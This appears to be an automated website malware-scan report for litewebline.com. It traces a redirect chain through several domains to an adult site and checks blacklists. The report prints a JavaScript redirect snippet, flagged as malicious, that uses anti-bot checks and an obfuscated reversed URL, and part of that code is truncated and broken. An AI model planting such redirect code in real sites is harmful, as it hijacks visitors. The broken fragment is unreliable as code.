Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: subscribepaullina.paullinatimes.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 31 Dec 2013 04:18:19 GMT
Server: Apache
Vary: *
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: subscribepaullina.paullinatimes.com
Referer: http://www.google.com/search?q=subscribepaullina.paullinatimes.com
Result:
The response is the same as for the first query. No suspicious redirects were found.
Scanned pages/files
Request | Server response | Status |
http://litewebline.com/ | 200 OK Content-Length: 60 Content-Type: text/html | clean |
http://litewebline.com/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 27 Aug 2014 03:54:26 GMT Location: http://processingrealise.com/in.cgi?4&parameter=%3fsearch04.shtml Server: nginx/0.8.54 Content-Length: 277 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://processingrealise.com/in.cgi?4&parameter=%3fsearch04.shtml | HTTP/1.1 302 Found Connection: close Date: Wed, 27 Aug 2014 03:54:27 GMT Location: http://processingrealise.com/in.cgi?3 Server: nginx/0.8.54 Content-Type: text/html Set-Cookie: SL_4_0000=_1_; domain=processingrealise.com; path=/; expires=Thu, 28-Aug-2014 03:54:27 GMT | clean |
http://processingrealise.com/in.cgi?3 | 200 OK Content-Length: 2367 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
<!--
var ab_iframe = 0;
if( top.frames.length ) ab_iframe = 1;
var ab_badtraffic = 0;
windowdata=getsize();
if( windowdata[0] < 300 || windowdata[1] < 200 ) ab_badtraffic=1;
if( f_clientWidth() < 300 || f_clientHeight() < 200 ) ab_badtraffic=1;
window.location=url_de("3?igc.ni/moc.esilaergnissecorp//:ptth")+"&ab_iframe="+ab_iframe+"&ab_badtraffic="+ab_badtraffic+"&antibot_hash=3596520009&ur=1&HTTP_REFERER=";
function url_de(s) window.innerHeight ? window.innerHeight : 0, document.documentElement ? document.documentElement.clientHeight : 0, document.body ? document.body.clientHeight : 0 ); }
function f_filterResults(n_win, n_docel, n_body) { var n_result = n_win ? n_win : 0; if (n_docel && (!n_result || (n_result > n_docel))) n_result = n_docel; return n_body && (!n_result || (n_result > n_body)) ? n_body : n_result; }
Antivirus reports:
http://processingrealise.com/in.cgi?3&ab_iframe=0&ab_badtraffic=0&ab_trash=1&antibot_hash=bot | HTTP/1.1 302 Found Connection: close Date: Wed, 27 Aug 2014 03:54:27 GMT Location: http://atmovs.com/jump.php?account=13857&design=002&programm=allbills Server: nginx/0.8.54 Content-Type: text/html Set-Cookie: SL_3_0000=_1_; domain=processingrealise.com; path=/; expires=Fri, 29-Aug-2014 03:54:27 GMT | clean |
http://atmovs.com/jump.php?account=13857&design=002&programm=allbills | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Wed, 27 Aug 2014 03:54:28 GMT Pragma: no-cache Location: index3.php?account=13857&referer%5B%5D=&agent_id=13857&agent_account=13857&programm=allbills&idproduct=30&p=&ex=&agent_name=webmaster Server: cloudflare-nginx Vary: Accept-Encoding Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT CF-RAY: 160553f72f170c95-AMS Set-Cookie: __cfduid=d40a59e9a29ccbdb6f8ec3b3d20c0434f1409111668344; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.atmovs.com; HttpOnly Set-Cookie: PHPSESSID=d6af2n7ggf0nu3s23dm4cr2h65; path=/ Set-Cookie: referer[]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.atmovs.com Set-Cookie: agent_name=webmaster; expires=Sat, 22-Aug-2015 03:52:39 GMT; Max-Age=31104000; path=/; domain=.atmovs.com Set-Cookie: agent_id=13857; expires=Sat, 22-Aug-2015 03:52:39 GMT; Max-Age=31104000; path=/; domain=.atmovs.com Set-Cookie: agent_account=13857; expires=Sat, 22-Aug-2015 03:52:39 GMT; Max-Age=31104000; path=/; domain=.atmovs.com Set-Cookie: programm=allbills; expires=Sat, 22-Aug-2015 03:52:39 GMT; Max-Age=31104000; path=/; domain=.atmovs.com Set-Cookie: p=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.atmovs.com Set-Cookie: ex=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.atmovs.com Set-Cookie: UNIQ_COOKIE_NAME_jump=webmaster%2F13857%2F13857; expires=Thu, 28-Aug-2014 03:52:39 GMT; Max-Age=86400; path=/; domain=.atmovs.com X-Powered-By: PHP/5.5.16-1~dotdeb.1 | clean |
http://atmovs.com/index3.php?account=13857&referer%5b%5d=&agent_id=13857&agent_account=13857&programm=allbills&idproduct=30&p=&ex=&agent_name=webmaster | 200 OK Content-Length: 81018 Content-Type: text/html | clean |
http://atmovs.com/join_tmwu.php?account=13857&referer%5B0%5D=&agent_id=13857&agent_account=13857&programm=allbills&idproduct=30&p=&ex=&agent_name=webmaster | 200 OK Content-Length: 19519 Content-Type: text/html | clean |
http://atmovs.com/ | 200 OK Content-Length: 68393 Content-Type: text/html | clean |
http://atmovs.com/join_new.php?account=0&referer%5B%5D=&agent_id=0&agent_account=0&programm=allbills&idproduct=30&p=&ex=&agent_name=webmaster | 200 OK Content-Length: 20236 Content-Type: text/html | clean |
http://atmovs.com/privacy.html | 200 OK Content-Length: 1171 Content-Type: text/html | clean |
http://atmovs.com/test404page.js | HTTP/1.1 302 Found Cache-Control: public, max-age=14400 Connection: close Date: Wed, 27 Aug 2014 03:54:30 GMT Location: http://teenmegaworld.com Server: cloudflare-nginx Content-Type: text/html; charset=iso-8859-1 Expires: Wed, 27 Aug 2014 07:54:30 GMT CF-Cache-Status: MISS CF-RAY: 16055405af0b0c95-AMS Set-Cookie: __cfduid=d0099b8a24f552327cee0136ab46910291409111670661; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.atmovs.com; HttpOnly | clean |
http://teenmegaworld.com/ | 200 OK Content-Length: 4068 Content-Type: text/html | clean |
http://teenmegaworld.com/test404page.js | HTTP/1.1 302 Moved Temporarily Cache-Control: public, max-age=14400 Connection: close Date: Wed, 27 Aug 2014 03:54:31 GMT Location: http://teenmegaworld.com/index.html Server: cloudflare-nginx Content-Type: text/html Expires: Wed, 27 Aug 2014 07:54:31 GMT CF-Cache-Status: MISS CF-RAY: 160554097de50c05-AMS Set-Cookie: __cfduid=da88003c4b5422555c634f7f095b090681409111671273; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.teenmegaworld.com; HttpOnly | clean |
http://teenmegaworld.com/index.html | 200 OK Content-Length: 4068 Content-Type: text/html | clean |
http://atmovs.com/terms.html | 200 OK Content-Length: 35925 Content-Type: text/html | clean |
http://atmovs.com/index3.php?account=0&referer%5B%5D=&agent_id=0&agent_account=0&programm=allbills&idproduct=30&p=&ex=&agent_name=webmaster | 200 OK Content-Length: 79866 Content-Type: text/html | clean |
http://atmovs.com/join_tmwu.php?account=0&referer%5B0%5D=&agent_id=0&agent_account=0&programm=allbills&idproduct=30&p=&ex=&agent_name=webmaster | 200 OK Content-Length: 19211 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=litewebline.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://litewebline.com/
Result: litewebline.com is not infected or malware details are not published yet.